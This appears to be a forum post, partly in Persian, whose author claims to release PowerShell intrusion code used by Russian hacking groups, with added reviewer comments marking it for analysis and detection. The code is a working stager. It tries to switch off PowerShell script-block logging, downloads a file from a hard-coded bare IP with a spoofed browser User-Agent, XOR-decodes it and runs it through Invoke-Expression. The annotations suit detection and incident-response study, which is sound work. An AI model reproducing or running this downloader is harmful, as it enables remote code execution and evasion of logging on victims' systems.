برا اولین بار در دنیا میخوام کدی که سالها برا APT 29 و تیم های هکری روسی نوشتم و برای نفوذ استفاده میکردن رو براتون بزارم (یادداشت بازبینی: این ادعای انتساب تأییدنشده است و از خودِ کد قابل استنباط نیست؛ کد زیر یک دانلودر/استیجر پاورشل ساده است و فقط برای تحلیل و ساخت قواعد تشخیص در محیط ایزوله بررسی شود.)
https://www.virustotal.com/gui/file/...a0684107fd04ce 7017687bb30f9b
https://www.virustotal.com/gui/file/...a0684107fd04ce 7017687bb30f9b
کد:
[B]#Code By E1.Coders[/B]
# NOTE(review): this is a malicious PowerShell downloader/stager posted for analysis.
# Do NOT execute outside an isolated lab. Comments below describe what the visible
# code does and which parts are useful as detection / IR indicators. Nothing here
# has been "fixed"; the code is reproduced exactly as posted.
#
# Flow as written:
#   1. try to switch off PowerShell Script Block Logging (defense evasion / anti-forensics),
#   2. fetch a file from a hard-coded IP over cleartext HTTP with a browser-looking User-Agent,
#   3. single-byte XOR-decode it, treat the result as PowerShell source, and Invoke-Expression it.
if ($PSVersionTable.PSVersion.Major -ge 3) {
    # --- Stage 1: Script Block Logging tamper -------------------------------------
    # Reaches into the internal Utils class to edit the in-process cache of Group Policy
    # settings, so that script blocks executed afterwards in this process are not written
    # to the PowerShell operational log (Script Block Logging, event 4104).
    $utils = [System.Management.Automation.Utils]
    # NOTE(review): the type literal on this line is spelled differently from the one above
    # ("Automination" vs "Automation"). As posted it is unlikely to resolve, so this call
    # would most likely throw; whether the tamper ever succeeds cannot be confirmed from here.
    $cachedGroupPolicySettings = $utils::GetFieldValue([System.Management.Automination.Utils], "cachedGroupPolicySettings")
    if ($cachedGroupPolicySettings) {
        if ($cachedGroupPolicySettings.ContainsKey("EnableScriptBlockLogging")) {
            # Zeroing both keys disables script-block and invocation logging for this process.
            $cachedGroupPolicySettings["EnableScriptBlockLogging"] = 0
            $cachedGroupPolicySettings["EnableScriptBlockInvocationLogging"] = 0
        }
        # Also writes the machine-wide policy value under HKLM (normally needs elevation).
        # A powershell.exe write to this registry path is itself a high-fidelity alert;
        # note the value written is whatever the cache holds, i.e. 0 when the branch above ran.
        Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\PowerShell" -Name "ScriptBlockLogging" -Value $cachedGroupPolicySettings["EnableScriptBlockLogging"]
    }

    # --- Stage 2: payload retrieval ------------------------------------------------
    # Spoofed desktop-Chrome User-Agent so the request blends in with browser traffic.
    $userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
    # IOC: hard-coded bare-IP staging host over cleartext HTTP (no TLS, no domain).
    $payloadUrl = "http://46.246.38.234/malware.exe"
    # IOC: drop location in the user's %TEMP%; the ".exe" name is misleading, see Stage 3.
    $payloadPath = "$env:TEMP\malware.exe"
    # Detection note: powershell.exe performing Invoke-WebRequest to a bare IP with a
    # browser UA and writing an executable-named file into %TEMP% is a strong combined signal.
    Invoke-WebRequest -Uri $payloadUrl -OutFile $payloadPath -UserAgent $userAgent

    # --- Stage 3: decode and execute in memory -------------------------------------
    # Single-byte XOR with 0x42. This is obfuscation, not encryption: the on-disk file
    # can be recovered for analysis by XOR-ing every byte with 0x42 again.
    $key = 0x42
    $payloadBytes = [System.IO.File]::ReadAllBytes($payloadPath)
    $decryptedPayloadBytes = $payloadBytes | ForEach-Object { $_ -bxor $key }
    # The decoded bytes are interpreted as UTF-8 text, not as a PE, despite the .exe name:
    # the real second stage is PowerShell source delivered under a misleading filename.
    $decryptedPayload = [System.Text.Encoding]::UTF8.GetString($decryptedPayloadBytes)
    # Execution step: Invoke-Expression on downloaded content. Any IEX of network-sourced
    # data is a classic stager pattern and should be alerted on regardless of Stage 1's outcome.
    Invoke-Expression $decryptedPayload
} else {
    # Everything above depends on PSv3+ APIs (the internal Utils reflection and Invoke-WebRequest).
    Write-Host "PowerShell version 3 or later is required to run this script."
}